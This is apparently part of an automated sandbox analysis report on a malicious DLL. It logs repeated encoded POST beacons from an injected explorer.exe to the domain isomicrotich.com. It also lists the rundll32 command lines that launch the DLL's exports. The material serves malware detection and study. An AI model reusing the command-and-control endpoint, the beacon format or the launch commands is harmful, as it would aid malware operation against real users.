2024-10-03 18:46:50 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFn9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:51 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:51 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FJFEky7IrDEfaWYtkcHpPGkRJfjidtBX2pP0JuVVshcp7VsNIkAaaTt03KxM4AJSziCyrs%2F5AohUMqhJaNH4Q66P9kvzbs30c72EpEFAJaoKzLm9%2FvwbcR4KO2o2kH9RBGQo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18e7afa942ad-EWR
2024-10-03 18:46:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49784 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:52 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFm9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:53 UTC | 593 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:53 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sA4mBVBucUmTG8qP4bAVnX5GCbc9oLyVhfSHLAha%2B7edt7lkehdLyaLQleQMVrRMx1fruzWYovenadt7yps50trHcB2M2sxv4ebw5PukjxxuYN8zn75bLWyZcF%2FLTVu7671T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18f52ab47292-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
2024-10-03 18:46:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49787 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:53 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFp9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:54 UTC | 571 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:54 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xtc2JP9Ae174%2FJD7K5ACzgaZ3iN27JQWx62HpT6B73JI8PwUBgvmE%2B6eYMQrFc1MtjmccnD5y4cW9IhuZv3%2BSJXbq5fTj5fa%2F%2FLVbYfJ1pA2rF%2F55OLVnlLdWWh2V01AYdK6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18fbbe6543f8-EWR
2024-10-03 18:46:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49788 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:54 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFo9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:55 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:55 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EIJDUExhyhqyH5qssSxfmRrhCWZ9yn%2FysbcgpLf9w9JSbhBKbHGToOrfL6GkQCMGvA8YYObcUDMbdNZuHpLbtPKniuHXIZZzBrEKUKH3NFp8vHgv%2B6GDg6tiXMSjmpZMA5yS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf19021d8742c3-EWR
2024-10-03 18:46:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49789 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:56 UTC | 417 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:56 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:56 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hioI1bPsazYNkNDedKGiAdqRHwL8PgQ225cJfndZRROOy8YJkHJ%2B5smxoG1KdHOcJTb0QybC%2FvhRQozJt40ijCY%2B8uGpMQeDuq56WnhyRTYT9gP%2BI49z%2B0VWgxW8hj0LlYlu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf19091ec142e8-EWR
2024-10-03 18:46:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49790 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:57 UTC | 417 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:57 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:57 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrjJ4%2FRXQRTmL4qYcO3ym59jxKrroGBQldVwUQ5q9dcgq9kHjdi9uBd%2BPQI%2FSBBmaslEPyBvJYm97jAqOz6gDC3V4Ve1FwHksOp0WaDcWDY%2FpznR0NJJ6DRPQqZDrHrP%2Btxf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf190fafd141ac-EWR
2024-10-03 18:46:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49793 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:59 UTC | 417 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:59 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:59 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2B8p754LvSgPzxEErctrsQ2CfllYp927CF5umDKsJKsUvikb9LacDaD41pzb%2FcApDO0TaTzhUSG0fMJGEyQ8AksdEhXHQg8kNyXRCaZIv%2By1cTsNHimUwlb4cYGMfUdGaGz%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf191bcfd40cb8-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                          13 | 192.168.2.9 | 49795 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
                                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                          2024-10-03 18:47:00 UTC | 417 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:47:00 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:47:00 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DItPFO1QuBUk90NXJ0gxjYZcGe4O0j%2BmAj8U9vkmDBHz8ve69DNsLYHNaKjMMS7nW0hcDKzFt2FCTIWFEN5I1dqDSPc8tBI%2Bm6BgyhXqPuGr6OOKpyxSrkDqDUUOpx3UndM7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf19237cb75e66-EWR
                                                                                                                                                                                                                          2024-10-03 18:47:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll"
                                                                                                                                                                                                                          Imagebase:0x7ff62c890000
                                                                                                                                                                                                                          File size:165'888 bytes
                                                                                                                                                                                                                          MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                                                                                                                                                                                                                          Imagebase:0x7ff71b580000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 3648 -s 316
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:14:44:57
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                          Start time:14:44:57
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 328
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                          Start time:14:45:00
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                          Start time:14:45:00
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7468 -s 320
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

